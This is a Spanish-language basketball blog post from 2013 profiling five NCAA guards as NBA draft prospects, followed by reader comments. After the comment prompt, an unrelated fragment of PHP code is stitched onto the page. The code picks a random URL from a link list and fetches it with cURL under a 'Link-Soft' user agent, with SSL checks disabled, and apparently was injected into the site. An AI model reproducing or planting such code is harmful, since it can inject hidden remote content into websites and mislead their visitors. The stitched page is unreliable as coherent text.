Los guards de la March Madness

18 de March de 2013 por melo15

Con la March Madness a la vuelta de la esquina y con el objetivo de despertar vuestro interés,  iniciamos una serie de tres artículos en los que presentaremos a los jugadores que potencialmente pueden ser importantes en la NBA.

Comenzamos sin más dilación por los Guards

Ben McLemore: Escolta
Universidad: Kansas Jayhawks
Altura: 1’98
Comparación: Ray Allen
Estadísticas: 17pp, 5rp y 2ap

El escolta de  Kansas ha sido comparado con el jugador de Miami durante todo el año, y no es casualidad. McLemore está dotado de una combinación de habilidad atlética y calidad que lo hacen prácticamente indefendible a este nivel.

Goza de buena altura y buen físico, es muy efectivo  penetrando y aún mejor tirando y además no se muestra nada egoísta e intenta hacer jugar a sus compañeros. Es todo un especialista tirando entre cortinas y jugando sin balón, faceta en la que se mueve con mucha inteligencia.

Debería trabajar más el manejo de balón y la selección de tiro que es buena pero puede mejorar.

Es el segundo año en Kansas de McLemore pero el primero en que salta a la cancha. El primer año se lo pasó entrenando debido a algunos problemas con sus registros en los diferentes institutos por los que pasó. Este año los Jayhawks aspiran a todo, título nacional incluido. Cuentan con un equipo muy completo y poseen la experiencia adquirida en la final del año pasado. Esta March madness es una interesantísima piedra de toque para McLemore. 

Marcus Smart: Base
Universidad: Oklahoma State
Altura: 1’95
Comparación: James Harden
Estadísticas: 15pp, 4ap y 3rop 

Marcus Smart es uno de los jugadores más completos de este año, un base alto, fuerte y potente. Tiene un cuerpo físicamente  muy trabajado y desarrollado física y atléticamente lo que no significa que esté exento de calidad. De todas maneras, utiliza muy bien su físico para definir cerca del aro y además saca bastantes faltas. Su tiro le lastra un poco pero ha ido mejorando y ahora mismo es un tirador más que aceptable. Como base sabe dirigir a su equipo aunque la falta de calidad de su plantilla  le lastran en este aspecto y además pierde bastantes balones.Casi 3 por partido.

Si en ataque destaca es en defensa donde es sencillamente sensacional. Su gran físico, unido a su buena actitud en esta faceta, le hacen un gran defensor, como muestran sus 3 robos por partido.

 Este año los Cowboys han mejorado y están haciendo una buena temporada encabezados por Smart y Le’Bryan Nash. A pesar de esto dudo que tengan la calidad y experiencia para llegar a la Final Four. Tendrían que eliminar a equipazos como Lousiville o Duke para conseguirlo.

Victor Oladipo: Escolta
Universidad: Indiana Hoosiers
Altura: 1’98
Comparación: Metta World Peace
Estadísticas: 14pp, 6rp, 2rop

Todo lo que hace que el nombre de Victor Oladipo siga subiendo enteros en el Draft es su continua y por momentos imparable progresión. El jugador de tercer año de Indiana ha ido trabajando y mejorando desde el primer día hasta que finalmente este año ha dado el gran salto que le llevará casi seguro hasta los puestos más altos del Draft.

Oladipo es el jugador que todo entrenador desearía para su equipo: físicamente dotadísimo, trabajador, gran defensor, buen finalizador y con un tiro que mejora día a día. Es de aquellos jugadores que sabes que no será una superestrella pero que su rendimiento en ambos lados de la pista le hará un jugador muy útil en su carrera profesional.

Por el contrario, como ya he dicho, le falta calidad en la ofensiva además de que suele jugar con demasiada intensidad y en ocasiones parece fuera de control.

Los Hoosiers son uno de los grandes favoritos para llevarse el título nacional este año y Oladipo tiene buena culpa de ello.

Michael Carter-Williams: Base
Universidad: Syracuse
Altura: 2’00
Comparación: Kendall Marshall
Estadísticas: 12pp, 8ap, 3rp

Este gran base de casi dos metros es sin duda el base más puro del Draft. El nivel que alcanzado este año en Syracuse es sin duda sorprendente y ha dirigido al equipo de Jim Boheim con gran maestría y eficiencia.

MCW, como lo apodan allí, es un base estilo Kendall Marshall: muy buen director, mejor en defensa, mejor aún en ataque y más atlético aunque peor tirador.  Ese 27% de acierto en triples es su gran lastre. También debería ganar fuerza y reducir sus pérdidas. A veces  bastante ridículas.

Este año en Syracuse ha hecho una buena aunque irregular temporada. Creo que los Orange no podrán alcanzar los cotas a las que llegaron el año pasado y  hasta puede que sean una de las sorpresas negativas del March Madness.

Trey Burke: Base
Universidad: Michigan Wolverines
Altura: 1’80
Comparación: D.J Augustin
Estadísticas: 19pp, 7ap y 1,5rop

Cerramos nuestro análisis de los mejores guards, con quizás el único base que es a la vez un buen anotador y distribuidor de juego. Hablamos del pequeño base de Michigan, Trey Burke, uno de los mejores y más carismáticos jugadores de la NCAA.

El base de los Wolverines anota cerca de 20 puntos por partido y es bastante certero desde la línea de 3.  También es un buen canalizador de juego y dirige al equipo con maestría cuidando mucho sus perdidas de balón, apenas dos este año.

Con esta tarjeta de presentación habrá gente que se pregunte cómo es que no está en los cinco primeros puestos. La respuesta es que Burke, a parte de ser pequeño, no es muy explosivo ni rápido, y además debería mejorar su desempeño en defensa.

Los Wolverines se presentan al March Madness como uno de los equipos a batir pero su dependencia del tiro exterior les hace ser muy irregulares. Pueden caer a las primeras de cambio o ser la gran sorpresa.

Comenta

9 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Este año posiblemente la March Madness se perfila como fundamental para aclarar las posiciones de draft.De Smart se habla mucho como pick para Orlando,no se,a mi me recuerda a Dion Waiters.McLemore por su parte me recuerda a Bradley Beal.Si tuviera que apostar por uno sería por el segundo,pero veamos en el momento de la verdad como responden a la presión.

      Citar

  2. Denise dice:
    #2

    Joder Melo, que gran articulo, ademas me viene de perlas, que hoy estoy aburrido sin nada que hacer en el trabajo y tengo tiempo de sobra para leeros..

    Smart lo pones de base y lo comparas con Harden?? Es raro, no?

    Bueno, a ver si el McLemore ó el Smart éste cae para Orlando que necesitamos como el comer un 1-2 con tiro exterior y capacidad de crearse sus propios tiros.

      Citar

  3. txusma dice:
    #3

    Un base de 2 metros y todavía nadie lo ha comparado con Magic? Pero esto que es?

    Otra cosa no sé pero vaya planta tiene McLemore y ¡como las enchufa!

      Citar

  4. melo15 dice:
    #4

    Aunque Smart sea base tiene la altura de Harden y tambien hay que recordar que Harden tambien tiene bastante capacidad para dirigir I tal.
    Tampoco hay que tomarse estas comparaciones tan a pecho, pero tampoco hay muchos bases de las caracteristicas de Smart.
    Txus, llego a comparar a MCW con Magic y mas de uno y con razon me mata.

      Citar

  5. MagicJohnson32 dice:
    #5

    melo15:
    Txus, llego a comparar a MCW con Magic y mas de uno y con razon me mata.

    Muy prudente por tu parte…

    …pero recuerda que permanezco vigilante ¬¬

      Citar

  6. Simon dice:
    #6

    melo lo de Txusma yo creo que era ironia mas bien.

      Citar

  7. Vader dice:
    #7

    ¿Este Smart se podria comparar a un proyecto de Deron Williams?

      Citar

  8. melo15 dice:
    #8

    Bueno, no son el mismo jugador aunque tienen caracteristicas fisicas muy similares, ya que Smart al igual que Deron tiene cuerpo de escolta, es muy fuerte…
    Por el momento Smart es peo tirador y no creo que pueda llegar a ser tan “base puro” como Deron.
    Pero yo creo que con oportunidades y suerte puede llegar a un nivel también muy alto, aunque no creo que llegue a ser tan bueno como Deron en los Jazz.

      Citar

  9. Jose Luis dice:
    #9

    Marcus Smart no se presenta al draft 2013

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>